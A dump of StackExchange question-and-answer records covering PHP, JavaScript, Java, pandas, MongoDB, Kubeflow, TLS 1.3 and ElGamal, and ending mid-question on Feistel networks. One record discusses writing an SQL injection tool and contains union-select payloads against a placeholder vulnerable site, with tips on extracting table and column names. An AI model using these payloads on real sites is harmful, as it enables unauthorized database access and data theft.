input passed from controller to a view, than using @POST.field in view directly..\nComment: so now after the user has been submitted valid data, how would one display that form again with success message, preventing further resubmission by clicking f5? should i do `$f3->clear('myformdatafields')`in that `if($form_validated)` block, and then do `$this->renderForm()`, or there is no need to clear variable, just call `renderForm()` without `$input`?\nComment: can I use native F3, `f3->set('SESSION.message', 'message');`, then after\nreroute and display message to the user, clear it in `afterroute()`? Would\nthat work?\n","meta":{"source":"stackoverflow","title":"fatfree framework, repopulate fields after unsuccessful validation","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to check if two Facebook id are friends or not Codeigniter\n\nQuestion: Hi I have user registered through facebook in my App and In mysql database I am having facebook unique id.\nHow can i get the list of my facebook friends from mysql database.\nI mean using facebook sdk compare two facebook id and get result if they are friends or not\nAnswer: You get a list of all friends (who authorized your App) with the <code>\/me\/friends<\/code> endpoint. 
You can also get the friends info for a specific friend like this: <code>\/me\/friends\/123455<\/code> (the number is the friend id).\nIf you need to know if two App users are friends while they are not online, you can do two different things:\n\nStore an Extended User Token for each user, it is valid for 60 days and you can use the API call above to check if two users are friends.\nStore the IDs of friends (= the result of <code>\/me\/friends<\/code>) when the user authorizes your App, and update the info whenever he visits your App again. That way you don\u00b4t even need an API call, but the friends may not be up to date.\nComment: I need to check if two users are friends by passing their facebook id\nComment: i will add some more info to my answer\n","meta":{"source":"stackoverflow","title":"How to check if two Facebook id are friends or not Codeigniter","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to schedule jobs in Kubeflow?\n\nQuestion: I'm setting up a Kubeflow cluster on AWS EKS, is there a native way in Kubeflow that allows us to automatically schedule jobs i.e. (Run the workflow every X hours, get data every X hours, etc.)\nI have tried to look for other things like Airflow, but i'm not really sure if it will integrate well with the Kubeflow environment.\nAnswer: That should be what a recurring run is for.\nThat would be using a run trigger, which does have a cron field, for specifying cron semantics for scheduling runs.\n","meta":{"source":"stackoverflow","title":"How to schedule jobs in Kubeflow?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can the data transfered from a PC to Dropbox or a USB drive be logged and detected?\n\nQuestion: I have some problems with my manager and am in process of using a lawyer to litigate with regards to workplace harassment. The litigation is planned to be \"soft\" and my lawyer only plans to send the employer an email saying that he has heard cases of workplace hostility from me according to which I am seeking a constructive dismissal and claiming a reasonable severance. I am concerned that the employer might react aggressively and retaliates by looking at the logs of my computer to see if it can accuse me of theft. \nI have transferred some of the files which I was working on (non are highly top secret - I am a designer) plus some personal files such a benefit claims and bank statements and pictures to Dropbox and a usb drive. I have deleted all my web browsing history. I have taken the files only to make my portfolio for future job searches, I had already discussed with my manager about how I can show case my work for future employers.\nCan they track if data was uploaded to drop box? Can they detect what data?\nSame question for USB key, I already know they can track the USB, but can they detect what files exactly, in other words can they accuse me for taking my music files?\nComment: How should be know if \"they\" can? But yes, if prepared beforehand, every mouseclick, keystroke, screen content etc. 
of you can be logged.\nAnswer: If you are using a computer provided by, controlled by or just even accessed by your employer (as almost everybody does at work), then the answer is yes, your employer could potentially log what you are doing.\nWhen they have full control over your computer there is no limit to what they could log - screenshots, keystrokes, network traffic, etc, etc - and there is no reasonable way for you to find out.\nHowever, if you are not working with something sensitive surrounded by high security, it might be unlikely that your employer has gone through the effort to log these things. What they are most likely to have is perhaps logs of your network traffic, e.g. your HTTP requests (but probably not bodys since they take a lot of space). In these filenames of files uploaded to dropbox might be found. (And yes, even if you used HTTPS your employer could get around that with an installed root certificate.)\nSo the answer is possibly, but you can not know for sure.\n","meta":{"source":"security.stackexchange","title":"Can the data transfered from a PC to Dropbox or a USB drive be logged and detected?","dup_signals":{}},"subset":"stackexchange"} +{"text":"SQL Injection - Extracting database data from the page content\n\nQuestion: I have a question I am hoping someone could help with..\nI am in the process of writing an SQL Injection tool from scratch (I am aware there are already excellent tools out there such as SQL Map, but this one has to be written from scratch).\nThe problem I am having:\nWhen manually performing SQL injection to determine tables names or column names and so on using strings such as:\n<code>www.vulnerable site.net\/articles.php?id =-1 union select 1,2,group_concat(column_name),4 from information_schema.columns --<\/code>\nor\n<code>www.vulnarable site.net\/articles.php?id =-1 union select 1,2,table_name,4 from information_schema.tables --<\/code>\nit is easy to determine the table names\/column names as you can simply look at the page and read the column names that are returned in the page content.\nBut how can this be done in an automated way?\nDoing this in an automated fashion is a lot harder though because how does the tool know what on the page that is returned when the sql injection is executed are table names\/column names?\nWhat would be the most reliable way to do this so the tool knows what parts of the page content to extract because they are table names\/column names?\nfor example... could I parse\/search the page content for strings seperated by commas to get the table and column names that are output by the injection? Is there better more reliable ways to do it?\nyour help with this is much appreciated, many thanks\nComment: Can you try using regular expressions? Even better, try comparing original HTML code to the resultant after the injected query and see what's different. Also, if the page is vulnerable to XSS, you can using JavaScript to make an AJAX request for the results and put them in a certain div\nAnswer: The easiest way is to use blind sql injection. You know if the question you are asking is right or wrong depending on how long the query takes to execute. This is also the most flexible approach because a blind sql injection exploit will work regardless of the type of sql injection being exploited (blind, non-blind, select, insert, update, delete....). \nAnother approach is to try and identify a visible field on the page while you brute force the number of columns. 
Once you find this location on the page, then you can scrape data from this point (sqlmap does something like this for non-blind injection):\n<code>www.vulnerable site.net\/articles.php?id =-1 union select 'dsjhfsjhfdf'\nwww.vulnerable site.net\/articles.php?id =-1 union select 'dsjhfsjhfdf','sfjufewjfef'\n...\n<\/code>\nThis will work well with MySQL but some database types like postgresql, the columns in the union select must be the same type. So the database will also have to be brute-forced.\nComment: @perl-user If its non-blind injection you should be able to pull out the value of an arbitrary column. One option is to use the concat() function to surround the data that you are pulling out with a unique value. Then just use a regex to pull out the data between the two unique values. Damn simple son, maybe you should actually try solving problems, then you'll be a better problem solver ;)\nComment: thanks, the concat_ws() function was what I required. I didn't realise it could be used in that way to effectively print a user defined string to the page as well as the database data, thanks for your help.\nComment: I agree with your point about blind sql injection being the best\/easiest way. However, in this instance I am concentrating on union based injection, so your second suggestion (scraping the data once you have found the location on the page and so on) is the kind of thing I am looking for. Could you explain this a little further as I am a little unsure as to exactly how that would work? thanks for your help\nComment: @perl-user Well finding the content on the page is a technically difficult approach. However, you can use a union select with blind sql injection. [Here is an exploit that i wrote](http:\/\/www.exploit-db.com\/exploits\/4547\/) which uses a a binary search with blind SQL Injection to pull out bytes using O(log(n)) requests. I use a union select with blind sql injection to find messages in the `bin_ask` subroutine. Its also multithreaded, which makes it very fast.\nComment: Very interesting, I will definately have a look at that, thanks. Could you also tell me a little more about how you said sqlmap does it for non-blind SQL injection please as that method is still something I'm interested in aswell, thanks a lot for your help\nAnswer: The easiest way is to access the page with legit input and with the injection and look at the difference. If you know what content is not results and know what the format of the expected result is, it isn't that hard to pick out the details with things like regular expressions or some other parsing engine. \nGranted, any other dynamic elements (such as advertisements) that can differ from page load to page load may present a problem that would require a more elaborate plan.\nComment: Can you think of any ways that would allow me to pinpoint exactly where the returned data is on the page... for example, the data will be exactly between this string and this string, so I can then scrape everything in between these two points? thanks for your help\nComment: @perl-user as long as the source of the page is consistent between page loads, you just load the page normally and then compare one to the other until you get to a spot where it differs. You can then save the offset. 
If the page content differs from one page load to another, it's going to be a lot trickier and would likely require some manual effort to identify the correct dynamic block of source.\n","meta":{"source":"security.stackexchange","title":"SQL Injection - Extracting database data from the page content","dup_signals":{}},"subset":"stackexchange"} +{"text":"Randomness in Elgamel\n\nQuestion: Suppose that, instead of choosing r completely at random in ElGamal public key encryption, a lazy encryptor (Alice) derives it by following r\u2032= 2r. Suppose also that Eve knows that Alice had encrypted the same message m with the two random numbers r and r\u2032= 2r, thus creating two ciphertexts {k, c} and {k\u2032, c\u2032}. Answer the following questions.\n(a) Show how Eve can derive the message m using the two ciphertexts and the public key provided by Alice. \nAnswer: Okay, so this really seems like an homework question to me, so I am going to try to help you with a hint instead of serving the answer hot on a plate. If my assumption about it being a homework question is wrong, then I apologise but the following hint will help you out anyway. \nUsually the cipher text in El Gamal is of the form $c=(c1,c2)$, where $c1 = g^{r}$ and $c2 = m.h^{r}$. Now, if $r' = 2r$, then we have $c'=(c1',c2')$ where $c2' = m.h^{2r}$. \nConsidering the above, what happens if we divide c2' by c2, i.e $\\frac{c2'}{c2}$. Would we be able to obtain some information from the this division operation that we just did. \nAnother way to think of this would be the fact that El Gamal is not IND-CCA secure as it is multiplicatively homomorphic in the presence of a decryption oracle. Maybe this answer will help you understand this property better. This property here will help us do the above division through which the attacker can obtain the value of $h^{r}$ and consequently the value of $m$. \nHope this helps! 
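To make the hint concrete in the same notation (and assuming, as the question states, that both ciphertexts were produced under the same public key $h$): $\\frac{c2'}{c2} = \\frac{m.h^{2r}}{m.h^{r}} = h^{r}$, and since $c2 = m.h^{r}$ is also observed, Eve recovers $m = \\frac{c2}{h^{r}}$ without ever touching the private key.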
\nComment: If homework please don't write an answer, provide only hint on comments, that is [our current policy](https:\/\/crypto.meta.stackexchange.com\/questions\/1115\/do-we-want-to-update-the-way-we-handle-homework-questions\/1117#1117)\n","meta":{"source":"crypto.stackexchange","title":"Randomness in Elgamel","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't send file via ajax ( print_r($_FILES); Array ( ) )\n\nQuestion: I'm trying to send file, it works with common form confirm, but don't with XHR.\nHere my HTML:\n<code><form action=\"ajax\/upload.php\" method=\"post\" name=\"form1\" enctype=\"multipart\/form-data\" id=\"id1\">\n <input type=\"file\" name=\"input1\">\n <input type=\"submit\" name=\"submit1\">\n<\/form> \n\n<form action=\"ajax\/upload.php\" method=\"post\" name=\"form2\" id=\"id2\">\n <input type=\"file\" name=\"input2\">\n <input type=\"submit\" name=\"submit2\">\n<\/form>\n<\/code>\nJS: \n<code>document.querySelector('#id2').onsubmit = function(e) {\n e.preventDefault();\n var file = document.querySelector('#id2 input[type=\"file\"]').files[0];\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", \"ajax\/upload.php\", true);\n var boundary = String(Math.random()).slice(2);\n xhr.setRequestHeader('Content-Type', 'multipart\/form-data; boundary=' + boundary);\n xhr.send(file);\n} \n<\/code>\nPHP: \n<code>echo '<pre>';\nvar_dump($_REQUEST);\necho 'print_r($_FILES); <br>';\necho 'Result: <br><br>';\nprint_r($_FILES);\nprint \"<\/pre>\";\n<\/code>\nI send same file, responses for common submit: \n<code>array(1) {\n [\"submit1\"]=>\n string(31) \"\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441\"\n}\nprint_r($_FILES); \nResult: \n\nArray\n(\n [input1] => Array\n (\n [name] => CRC75.otf\n [type] => application\/vnd.oasis.opendocument.formula-template\n [tmp_name] => \/tmp\/phpbNWcgk\n [error] => 0\n [size] => 411456\n )\n\n)\n<\/code>\nFor AJAX:\n<code>array(0) {\n}\nprint_r($_FILES); \nResult: \n\nArray\n( \n)\n<\/code>\nI can't understand why, file attached exist: \n<code>document.querySelector('#id2 input[type=\"file\"]').files[0]\nFile { name: \"CRC75.otf\", lastModified: 1529516347000, webkitRelativePath: \"\", size: 411456, type: \"application\/vnd.oasis.opendocument.formula-template\" } \n<\/code>\nHeaders of AJAX request looks normal\n<code>Accept: *\/*\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en;q=0.5\nConnection: keep-alive\nContent-Length: 411456\nContent-Type: multipart\/form-data; boundary=44316423440108066\nHost: localhost\nReferer: http:\/\/localhost\/\nUser-Agent: Mozilla\/5.0 (X11; Ubuntu; Linu\u2026) Gecko\/20100101 Firefox\/61.0 \n<\/code>\nP.S.: It's the requirement that I cannot send a <code>POST<\/code> request.\nAnswer: You can't send a <code>File<\/code> directly in the <code>send()<\/code> parameter, you need to use a <code>FormData<\/code> object.\n<code>document.querySelector('#id2').onsubmit = function(e) {\n e.preventDefault();\n var formdata = new FormData;\n var file = document.querySelector('#id2 input[type=\"file\"]').files[0];\n formdata.append(\"input2\", file);\n formdata.append(\"submit2\", \"\u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u0437\u0430\u043f\u0440\u043e\u0441\");\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", \"ajax\/upload.php\", true);\n xhr.send(formdata);\n} \n<\/code>\nDon't use <code>xhr.setRequestHeader()<\/code> to set the <code>Content-type<\/code> header. This is done automatically by the browser. 
If you do it yourself, the boundary you specify won't match what it's actually sending.\nComment: Still same result\n`var file = document.querySelector('#id2 input[type=\"file\"]').files[0]; \nvar formData = new FormData(); \nformData.append('File', file); \nxhr.send(formData); `\nComment: What are you trying to ask?\nComment: I send FormData object, but it still response as before.\n","meta":{"source":"stackoverflow","title":"Can't send file via ajax ( print_r($_FILES); Array ( ) )","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get text input without textbox\n\nQuestion: I want to create a in\/out dashboard at the front door with a computer & wall-mounted TV running full screen with no keyboard\/mouse, just a barcode scanner for input. Asp.net mvc dashboard app will display list of all currently present employees for receptionist. To display user list, if I had a textbox & 'Submit' button this would be easy. For design & COVID reasons, I want computer to be alway waiting for input from barcode scanner without any prompts\/textboxes. I just want employee to walk up to terminal and scan themselves upon entry\/exit. Does this make sense? I am at the design stage of this project and can't figure out how to get text input without traditional texbox\/submit method. Thanks.\nComment: hi kaoskev, sounds like an interesting project. I think your question might be a bit too broad, but yes, I believe it makes sense. I don't think you'll get a better answer than the one provided by @paulsm4.\nAnswer: Sure it makes sense.\nJust:\n\nFind a library that supports your Barcode scanner\nWrite the code that reads the scanner, and looks up the corresponding name (e.g. from a database)\nWrite the code that updates the list with the new name.\nYou'll probably also want to give the receptionist the ability to delete names from the list - or manually enter names that can't be scanned.\n\nADDENDUM:\n\nno keyboard\/mouse, just a barcode scanner for input ... I just want\nemployee to walk up to terminal and scan themselves upon entry\/exit...\n\nThis part might be challenging, for a couple reasons:\n\nIt would be nice if there was enough of a UI that the employee could click \"start scanning\" (e.g. with a button)\n\nIt's unclear if simply reading what's encoded in the bar code is sufficient. Often, a bar code contains minimal information (e.g. \"User ID\"), and you need to do additional processing (e.g. \"Look up username from ID in a database).\n\nHOWEVER ...\nLook here:\nBarcode scanner sample\nThis article discusses how to use DeviceWatcher, ClaimScannerAsync() and friends to receive scanner data asynchronously.\nSee also Obtain and understand barcode data.\nMuch of this seems to be UWP-specific - I'm not sure it'll necessarily all work for you.\nYou might also want to consider having a keyboard or mouse ... but \"locking down\" the PC into \"kiosk mode\". For example:\nhttps:\/\/learn.microsoft.com\/en-us\/windows\/configuration\/lock-down-windows-10-applocker\nComment: Thanks for the quick reply. I am not asking 'how do I use a barcode scanner\" because they act like keyboards, that's easy. My problem is more 'How do I get user data without having a textbox that needs to be displayed and needs to be infocus to accept input?' -thanks again.\nComment: I think you're putting the horse before the cart. No, you DON'T need a \"keyboard\" (or equivalent) to \"accept input\". And you certainly don't need a \"text box\". Q: How are you connecting your reader to the PC (I'm guessing USB port)? 
Q: Is the data encoded in the bar code \"complete\" (e.g. the full name you want to display), or is a \"lookup\" required (e.g. lookup the user name in the database, from the ID encoded in the bar code)? Q: Are you providing any kind of \"user interface\" to the user (e.g. a button to \"start reading\")?\nComment: Please consider answering the above questions by updating your post, and I'd be happy to try updating my reply. Also please look here, and see if it gives you any good ideas: [Barcode scanner sample](https:\/\/learn.microsoft.com\/en-us\/samples\/microsoft\/windows-universal-samples\/barcodescanner\/)\nAnswer: Here's what I managed:\nhttps:\/\/jsfiddle.net\/s2ryogxt\/\n<code>$(document).ready(() => {\n const input = document.getElementById(\"myInput\");\n\n input.style.position = \"absolute\";\n input.style.top = \"-100px\";\n input.focus(); \/\/ on DOM ready\n\n let timeout = null;\n input.addEventListener('keyup', () => {\n if (timeout) {\n clearTimeout(timeout);\n }\n timeout = setTimeout(() => {\n if(input.value) {\n alert(`I got ${input.value}`);\n input.value = \"\";\n }\n input.focus();\n }, 100);\n });\n});\n<\/code>\nThis is all JavaScript, you can replace the alert with your own call to the endpoint. Just make sure the field is always in focus, and you should be alright.\n","meta":{"source":"stackoverflow","title":"Get text input without textbox","dup_signals":{}},"subset":"stackexchange"} +{"text":"Returning a function with callback as input without inputting one at beginning\n\nQuestion: I am currently reading some codebase but I meet some code I can't understand at all.\n<code>const asyncMapper = (name, done) => (payload, cb) => {\n post(name, {...payload}, (...params) => {\n if(isFunction(done))\n done(cb, ...params)\n else\n cb(...params)\n })\n}\n<\/code>\nThe asyncMapper function will accept a variable <code>name<\/code> and <code>done<\/code> which is (hopefully) a function as input. It will return another function with <code>payload<\/code> and a callback function <code>cb<\/code> as input.\nWhile I understand payload may come from somewhere like the action\/reducer, where can the callback function come from. There is no way to input one anyway. (so for the <code>...params<\/code>)\nComment: payload and cb are *arguments to the returned function*, so they're supplied by the caller. The gathered params array is from what is fed to the anonymous callback by post. What does this have to do with React anyway?\nAnswer: I'm going to reformat that code a little bit to make the separation of its components a little easier to understand.\n<code>const asyncMapper = (name, done) => \n (payload, cb) => {\n post(\n name,\n {...payload},\n (...params) => {\n if(isFunction(done))\n done(cb, ...params);\n else\n cb(...params);\n }\n )\n }\n<\/code>\nEssentially, passing in <code>name<\/code> and <code>done<\/code> values generate a function that uses those values. That generated function takes a <code>payload<\/code> and a <code>cb<\/code> (callback). It calls the <code>post<\/code> function (though I'm not sure where this comes from), passing in the <code>name<\/code>, the <code>payload<\/code> object with <code>{...payload}<\/code>, and ANOTHER generated function with no declared parameters. 
The use of <code>...params<\/code> means that whatever parameters passed into this function can be passed into any functions called in its scope.\nThis generated function uses the <code>isFunction<\/code> function (also not sure where this comes from) using the <code>done<\/code> function. If <code>isFunction(done)<\/code> returns true, it calls the <code>done<\/code> function, passing it the <code>cb<\/code> function and whatever parameters were sent to this generated function. If <code>isFunction(done)<\/code> returns false, it calls the <code>cb<\/code> function, passing in whatever params were sent to this generated function.\nIn use, assuming you've already defined <code>name<\/code>, <code>done<\/code>, <code>payload<\/code>, and <code>cb<\/code> values, it would look something like this:\n<code>const generated = asyncMapper(name, done); \/\/ Generate the function\n\ngenerated(payload, cb); \/\/ Call the generated function\n<\/code>\nThe rest of the functionality depends on the <code>isFunction<\/code> and <code>post<\/code> functions.\nAnswer: <code>const asyncMapper = (name, done) => (payload, cb) => {\n post(name, {...payload}, (...params) => {\n if(isFunction(done))\n done(cb, ...params)\n else\n cb(...params)\n })\n}\n<\/code>\nCan be understood as below:\n<code>var asyncMapper = function asyncMapper(name, done) {\n return function (payload, cb) {\n post(name, { ...payload\n }, function () {\n for (var _len = arguments.length, params = new Array(_len), _key = 0; _key < _len; _key++) {\n params[_key] = arguments[_key];\n }\n\n if (isFunction(done)) done.apply(void 0, [cb].concat(params));else cb.apply(void 0, params);\n });\n };\n};\n<\/code>\n","meta":{"source":"stackoverflow","title":"Returning a function with callback as input without inputting one at beginning","dup_signals":{}},"subset":"stackexchange"} +{"text":"Abstract class in Java with global variables aren't setting?\n\nQuestion: I've got 2 classes setup, both extending a Module class. I'm trying to set 2 integers in one of them and using 2 integers in the other.\nHowever when I execute everything, it does get set (I know because of debugging) but when the method for 'printing' runs, it's still 0.\nI don't know what I'm doing wrong though.\nModule Class:\n<code>public abstract class Module {\n protected int min, max;\n}\n<\/code>\nFoo1:\n<code>public class Foo1 extends Module {\n public void setMinMax(){\n min = 2;\n max = 5;\n }\n}\n<\/code>\nFoo2:\n<code>public class Foo2 extends Module {\n public void printMinMax(){\n System.out.print(\"Min: \" + min + \" Max: \" + max);\n }\n}\n<\/code>\nComment: What do you mean by \"global variables\"? In your code It is natural that `setMinMax()` won't affect `printMinMax()` because no single instance can have both of the methods because they are in separate classes.\nComment: The problem is your understanding of java \/ oop\nAnswer: You have 2 instances of 2 different classes. One instance of a <code>Foo1<\/code>, with its own <code>min<\/code>\/<code>max<\/code>, and one instance of a <code>Foo2<\/code>, again with its own <code>min<\/code>\/<code>max<\/code>.\nNote that your <code>Foo<\/code> class provides the fields, and each time you instantiate a derived instance (of <code>Foo1<\/code> or <code>Foo2<\/code>), you'll get a new class with a new set of fields (including those derived from the base class)\nAnswer: When you set one instance, it has no effect on another instance. Each instance has it's own fields. 
Most likely what you imagined was\n<code>public abstract class Module {\n protected static int min, max;\n}\n<\/code>\nThis way the fields will be shared between all instances of <code>Module<\/code>. You should only set these field from a static method, ideally on <code>Module<\/code>\nHowever, I would avoid doing this, or using mutable static fields whenever possible.\n","meta":{"source":"stackoverflow","title":"Abstract class in Java with global variables aren't setting?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can't connect MongoDb on AWS EC2 using python\n\nQuestion: I have installed Mongodb 3.0 using this tutorial -\nhttps:\/\/docs.mongodb.com\/v3.0\/tutorial\/install-mongodb-on-amazon\/\nIt has installed fine. I have also given permissions to 'ec2-user' to all the data and log folders ie var\/lib\/mongo and var\/log\/mongodb but and have set <code>conf<\/code> file as well.\nNow thing is that mongodb server always fails to start with command \n<code>sudo service mongod start\n<\/code>\nit just say <code>failed<\/code>, nothing else.\nWhile if I run command -\n<code>mongod --dbpath var\/lib\/mongo\n<\/code>\nit starts the mongodb server correctly (though I have mentioned same dbpath in <code>.conf<\/code> file as well)\nWhat is it I am doing wrong here?\nAnswer: When you run <code>sudo mongod<\/code> it does not load a config file at all, it literally starts with the compiled in defaults - port 27017, database path of \/data\/db etc. - that is why you got the error about not being able to find that folder. The \"Ubuntu default\" is only used when you point it at the config file (if you start using the service command, this is done for you behind the scenes).\nNext you ran it like this:\n<code>sudo mongod -f \/etc\/mongodb.conf\n<\/code>\nIf there weren't problems before, then there will be now - you have run the process, with your normal config (pointing at your usual dbpath and log) as the root user. That means that there are going to now be a number of files in that normal MongoDB folder with the user:group of <code>root:root<\/code>. \nThis will cause errors when you try to start it as a normal service again, because the mongodb user (which the service will attempt to run as) will not have permission to access those <code>root:root<\/code> files, and most notably, it will probably not be able to write to the log file to give you any information. \nTherefore, to run it as a normal service, we need to fix those permissions. First, make sure MongoDB is not currently running as root, then:\n<code>cd \/var\/log\/mongodb\nsudo chown -R mongodb:mongodb .\ncd \/var\/lib\/mongodb\nsudo chown -R mongodb:mongodb .\n<\/code>\nThat should fix it up (assuming the user:group is <code>mongodb:mongodb<\/code>), though it's probably best to verify with an <code>ls -al<\/code> or similar to be sure. Once this is done you should be able to get the service to start successfully again.\nIf you're starting mongod as a service using:\n<code>sudo service mongod start\n<\/code>\nMake sure the directories defined for logpath, dbpath, and pidfilepath in your mongod.conf exist and are owned by mongod:mongod.\nComment: Well, I am reading the same answer http:\/\/stackoverflow.com\/a\/12232668\/609782\nWhat I didn't understand is, my service name is `mongod` and I am logged in as `ec2-user`, so while doing `chown` what should be my `user:group`? 
it is definitely not mongodb:mongodb, is it?\nComment: Do ls -al and check what is the user group and change the permission accordingly.\nComment: need to call `ls -al` on which folder? (or it doesn't matter?) as when I did that on root directory, i got a list with different user:groups\nComment: \/etc\/mongodb folder\n","meta":{"source":"stackoverflow","title":"Can't connect MongoDb on AWS EC2 using python","dup_signals":{}},"subset":"stackexchange"} +{"text":"How does TLS 1.3 provide authentication without using the public key to verify that the server has a private key?\n\nQuestion: In the TLS 1.2 handshake, after checking the certificate, the public key from the certificate was used to encrypt the data to create a symmetric encryption key, hence the authentication took place on the factor of knowing the private key, as it is needed to decrypt that data.\nIn TLS 1.3, the public key cannot be used to encrypt data needed to create a symmetric encryption key because this data is included in the first message sent by the client and the client cannot know the public key until it receives the certificate that the server sends in response to the first message.\nSince the public key is not used to encrypt data needed to generate a symmetric encryption key or any other data the private key knowledge factor disappears.\nHow does TLS 1.3 provide authentication and what is the point of using PKI and Public Key Certificate if the public key is not used to verify that the party has a private key?\nAnswer: \n... the public key from the certificate was used to encrypt the data to create a symmetric encryption key, hence the authentication took place on the factor of knowing the private key, as it is needed to decrypt that data.\n\nThis was not the authentication. What you describe is the RSA key exchange, which was removed in TLS 1.3 and is even considered obsolete with TLS 1.2.\nThe proof that the server knows the private key is instead done with the CertificateVerify message, which is (slightly simplified) a signature (using the private key) over the messages previously send in the handshake. This means it also includes client side random data and thus can not be simply replayed within another handshake.\nComment: @\u5085\u7ee7\u6657: For DH key exchange it is done by digitally signing parts of the ServerKeyExchange.\nComment: The party whose authenticity is being verified sends:\n* Certificate - the party's certificate chain.\n* CertificateVerify - a digital signature made with a private key based on a [Transcript-Hash(Handshake Context, Certificate)](https:\/\/datatracker.ietf.org\/doc\/html\/rfc8446#section-4.4.1) and the algorithm by which this digital signature is made.\n\nThen, the other party verifies the certificate chain and uses the public key from the certificate to verify the electronic signature from CertificateVerify, right?\nComment: @NikitaKhodakovsky: correct. Although it does not matters if the signature in CertificateVerify is verified first or the certificate + chain. Probably the latter is done only after validating the signature since certificate validation is more expensive, especially if revocation is properly accounted for.\nComment: So what is the proof that the server knows the private key in TLS 1.2?\nComment: @SteffenUllrich Thank you so much. I've been reading RFC documents and, as you mentioned, I found that the phases of verifying the server's private key are completely different. 
In addition, in TLS 1.2, the data to be signed includes only the Diffie-Hellman parameters, while in TLS 1.3, it includes all the content of the entire handshake phase. This difference is significant, and surprisingly, there are very few online articles that mention it, which is also a point that confuses me.\nAnswer: The key exchange in TLS 1.3 is mainly based on the SIGMA protocol, implementing a \"SIGn-then-MAc\" variant of SIGMA. I will only describe high-level ideas for the full handshake, other considerations are needed for other handshake like the PSK mode. For an extensive security analysis, I recommend \"A cryptographic analysis of TLS 1.3 handshake protocol\" by Dowling, Fischlin, G\u00fcnther and Stebila.\n\nHow does TLS 1.3 provide authentication\n\nZooming out of TLS 1.3, SIGMA builds on an unauthenticated DH and authentication in SIGMA is guaranteed by signature over the communication transcript of the key exchange and a MAC over the identity of the authenticating party. The basic SIGMA flow with mutual authentication between a Client C and Server S is as follows:\n\nC -> S: $g^x, \\text{identity(C)}$.\nS -> C: $g^y, \\mathrm{sig}(sk_S, g^x, g^y), MAC(identity(S))$\nC -> S: $\\mathrm{sig}(sk_C, g^x, g^y)$\n\nSIGMA is shown (here for example) to provide strong authentication guarantees, key secrecy and forward secrecy even assuming a strong attacker; i.e.: an attacker that fully control the network, that can reveal established session keys, compromise the long-term signing keys of some entities. As a consequence, TLS 1.3 inherits those guarantees, though it makes a few changes like deriving the keys with a more complex key schedule that incorporate the entire transcript in the key schedule.\n\nwhat is the point of using PKI and Public Key Certificate if the public key is not used to verify that the party has a private key?\n\nFirstly, as seen in the SIGMA flow. The public keys are used to provide signature during authentication. Additionally, a PKI serves as a trusted way to bind identities to public key. This is necessary since a malicious party can impersonate another without any ground truth regarding identities and public keys.\nNote that, technically, SIGMA doesn't take maliciously generated public keys into it's threat model. But this is another issue.\n","meta":{"source":"crypto.stackexchange","title":"How does TLS 1.3 provide authentication without using the public key to verify that the server has a private key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is there a way to filter out rows from a table with an unnamed column\n\nQuestion: I'm currently trying to do analysis of rolling correlations of a dataset with four compared values but only need the output of rows containing 'a'\nI got my data frame by using the command <code>newdf = df.rolling(3).corr()<\/code>\nSample input (random numbers)\n<code> a b c d \n1 a\n1 b\n1 c\n1 d\n2 a\n2 b\n2 c\n2 d\n3 a \n3 b 5 6 3\n3 c 4 3 1 \n3 d 3 4 2\n4 a 1 3 5 6 \n4 b 6 2 4 1 \n4 c 8 6 6 7 \n4 d 2 5 4 6 \n5 a 2 5 4 1 \n5 b 1 4 6 3\n5 c 2 6 3 7\n5 d 3 6 3 7\n<\/code>\nand need the output\n<code> a b c d\n1 a 1 3 5 6\n2 a 2 5 4 1\n<\/code>\nI've tried filtering it by doing <code>adf = newdf.filter(['a'], axis=0)<\/code> however that gets rid of everything and when doing it for the other axis it filters by column. Unfortunately the column containing the rows with values: a, b, c, d is unnamed so I cant filter that column individually. 
This wouldn't be an issue however if its possible to flip the rows and columns with the values being listed by index to get the desired output.\nAnswer: Try using <code>loc<\/code>. Put the column of <code>abcdabcd ...<\/code> as index and just use <code>loc<\/code>\n<code>df.loc['a']\n\n<\/code>\nComment: I tried to do that but but the column of abcdabcd has no column name so I don't know how to assign it\nAnswer: The actual source of problem in your case is that your DataFrame\nhas a MultiIndex.\nSo when you attempt to execute <code>newdf.filter(['a'], axis=0)<\/code> you want\nto leave rows with the index containing only \"a\" string.\nBut since your DataFrame has a MultiIndex, each row with \"a\" at\nlevel 1 contains also some number at level 0.\nTo get your intended result, run:\n<code>newdf.filter(like='a', axis=0)\n<\/code>\nmaybe followed by .dropna().\nAn alterantive solution is:\n<code>newdf.xs('a', level=1, drop_level=False)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Is there a way to filter out rows from a table with an unnamed column","dup_signals":{}},"subset":"stackexchange"} +{"text":"FileBrowser which shows files from different directories using python QtGUI\n\nQuestion: I have full path of some pdf files which are in different directories and I want to show those files in one Window from where user can click and open them by and document viewer.\nSince I'm new to python and QtGUI, I am unable to figure out how to do this. Here is something that i had seen but unable to figure out how it is happening. When I run it, shows folder hierarchy , but instead of that i just want to show files of which i have complete path.\nThanks in advance.\nAnswer: This code was working for me \n<code>import subprocess\nimport os\nimport sys\nfiles = ['\/home\/test\/kelvin\/refresh.html','\/home\/test\/kelvin\/thread.html']\nprint list(enumerate(files))\nno=raw_input(\"enter the file no\\n\")\nno1 = int(no)\nif sys.platform == 'linux2':\n subprocess.call([\"xdg-open\", files[no1]])\nelse\n os.startfile(files[no1])\n<\/code>\nComment: Thanks kelvin, xdg-open solved my problem.Initially I wanted to make a window to display files in separately , but since I have the the file path I can open them with \"xdg-open\"\n","meta":{"source":"stackoverflow","title":"FileBrowser which shows files from different directories using python QtGUI","dup_signals":{}},"subset":"stackexchange"} +{"text":"Luby-Rackoff theorem for Generalized Feistel\n\nQuestion: I was reading about Luby-Rackoff theorem from various sources: [1], [2], [3], which says you need at least 3 rounds of a $2$-branch Feistel network to get a PRP if the underlying $f$ function is a PRF. I also came to know about the Generalized Feistel Network which has more than two branches.\nWhat will be the minimum number of rounds to get a PRP from a generalized $n~(>2)$ branch 